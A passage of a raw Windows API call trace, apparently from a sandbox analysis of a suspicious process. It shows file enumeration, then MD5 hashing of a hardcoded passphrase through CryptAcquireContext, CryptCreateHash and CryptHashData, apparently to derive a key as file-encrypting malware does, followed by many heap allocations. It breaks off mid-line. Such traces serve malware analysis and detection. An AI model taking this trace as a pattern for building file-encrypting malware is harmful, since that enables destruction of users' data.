ftCreationTime.dwLowDateTime=0x746906c0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd2e63af0, ftLastAccessTime.dwHighDateTime=0x1d5f102, ftLastWriteTime.dwLowDateTime=0xd2e63af0, ftLastWriteTime.dwHighDateTime=0x1d5f102, nFileSizeHigh=0x0, nFileSizeLow=0x83cc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Lh2OVLi_4PS_2RxxQd.odp", cAlternateFileName="LH2OVL~1.ODP")) returned 0x41ac200 [0076.815] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0076.815] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0076.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0076.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0076.815] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0076.816] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.816] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.816] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.817] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0076.817] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0076.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.817] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2ae8 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b48 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0076.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0076.818] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b48 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0076.819] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.820] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca9a0 [0076.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.822] CryptHashData (hHash=0x41ac600, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0076.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0076.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0076.824] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0076.824] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0076.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.825] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.825] RtlAllocateHeap 